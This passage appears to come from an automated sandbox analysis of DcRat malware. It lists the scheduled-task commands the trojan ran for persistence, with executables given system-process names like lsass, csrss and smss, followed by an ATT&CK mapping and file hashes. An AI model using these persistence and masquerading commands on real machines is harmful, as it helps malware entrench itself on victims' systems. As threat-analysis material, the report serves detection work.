C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Favorites\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\taskhostw.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3184
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4744
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\blockweb\smss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\blockweb\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\blockweb\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2648
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Windows\Vss\services.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:456
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\Vss\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Windows\Vss\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\blockweb\services.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1172
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\blockweb\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2164
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\blockweb\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Windows\Speech_OneCore\smss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Windows\Speech_OneCore\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\blockweb\upfc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\blockweb\upfc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:548
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\blockweb\upfc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\blockweb\fontdrvhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4504
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\blockweb\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\blockweb\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\blockweb\upfc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\blockweb\upfc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\blockweb\upfc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\lsass.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Google\Chrome\Application\csrss.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\csrss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2576
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57800fca2323a4130444c572374a030f4
SHA140c9b8e0e5e7d72a5293f4010f2ccf21e637b4aa
SHA25629f5645ac14353ac460858f52c856548f3aeb144b09eef672a6b4849bafe742e
SHA512c8a7ad930b8c07007c7a67d8c32a2a4a401dcc34ab966e0e80901655fcbe1f5c95b72a195e6381b1de56c2c987eeab093d8e89891bec9e9684785c5d824b3554
-
Filesize
229KB
MD506129ffc46e854930cfcaa754ca1d487
SHA1e7c173c48aa107ec63bd6f9030c9ec6fe889d832
SHA25610d28e18a7df4b2c30e05e5e361f1724e0b6ea8c021d8105ee30354be79b98d1
SHA512b7121a2a65f317edbc1b4dd8dec427c277fad2b521a211d1408bc06b79431c418dad32ed61481c5ef49511cd167846e026a86147ae77bd9b0e607918feb66ab9
-
Filesize
2.5MB
MD56e01d4882274684f48e04436103ad57f
SHA13b88df5fc9e6973bf3ecb1e2ed759b86774cb290
SHA256424497764bc1e2cd57f454d173dceeb9dcd7f900aaf5060110da629d11fadf8d
SHA5123e5ed6ee7458f4662dd9bbe572620fc591e69fbc6d8e98013ec0f39a95eb9da55561a232eea23192fbc59368b99f99ee6a00df23bcff253c327aa3eb607c7d7e
-
Filesize
7.5MB
MD5b76057df968a944446f950dd4ddc6aec
SHA1bb64de1c677368764000d34c29528ead2f48405c
SHA256afe91fea04d39de5710ad065252d13b9df7b7bd25788ddf5afb162a2f0a03296
SHA5127f45198fe05013ceab477784bde2b1c4532607bd8ba8d9cfb09c5bb037dd2616086c8cb3afd669b24ec89eedbd270d00f1bd6bce2644b40ed36b8f32fc5fdb31
-
Filesize
12.7MB
MD57db5128f7a81cc1af094d8898e79ff21
SHA1d503984331d5999c14931c267d859fbd1510c282
SHA2562952fa4ab9bc3e2b04b1f3ab6b648d0d23fa74856c50bf21fb13fddfe9a874bb
SHA512caceec284b71df124d47267e5ca42bf84e558aa9606b0186f132fba8d2bead2ddbd9304cd82761270b6c42271e0937aeff605ef5d865c424cc29b39ca05b123a
-
Filesize
3KB
MD54c35b71d2d89c8e8eb773854085c56ea
SHA1ede16731e61348432c85ef13df4beb2be8096d9b
SHA2563efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42
SHA512a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d
-
Filesize
221B
MD5ca2cae3c10113fc32484a48196e2ffaa
SHA18eb74a53fe655c5b538246f42cc078d8900bf215
SHA25698311058614dd00a0d0e9e9c38f9df5d1d951525741fc46901d1a396baddd8f2
SHA5126cf05ca56f4c6320bc490401e742f81230e6c138651d958776f497d5e4889fe16c5853a1864791a3f10b4b3d103f5218894be4c7009d1eb7b32e243111b166af
-
Filesize
39B
MD519fe83feec263d4e4e68e3dd0e6b3615
SHA17ff948a654d54acfde0e798fe1d67160343f8dfd
SHA25607dc5ed69f4847071b41d0086ef8a11032c2d85b1ec8a8b00a5d29480c3e6744
SHA512ee6fef4211b60dff50b7cdb88f9ec0028a67bc428ab854c0932db7e5873f9a22e16760d59ff6b885fdb96ed7f6582d3735f629d6e825dcfd1e8c13c5d5adae78
-
Filesize
34B
MD5677cc4360477c72cb0ce00406a949c61
SHA1b679e8c3427f6c5fc47c8ac46cd0e56c9424de05
SHA256f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b
SHA5127cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a
-
Filesize
2.2MB
MD584c6cb042dc58a109dfa2db8381bec28
SHA14a86e72e9d2c3e0c17cd3a09df754169f4b7ce31
SHA2562e09ed806f9a7c57186872ab3715909437e2729500bc194e0a2cf3405c4cd5f0
SHA512c8ef31a3eaeac8ef0faa043d0bdd085063d54572d0a7eefade08a9db5f97c397bb3270baca71817da9d91c0d1227fcee9ce019065bb5a66f20fed9d7349ab0ef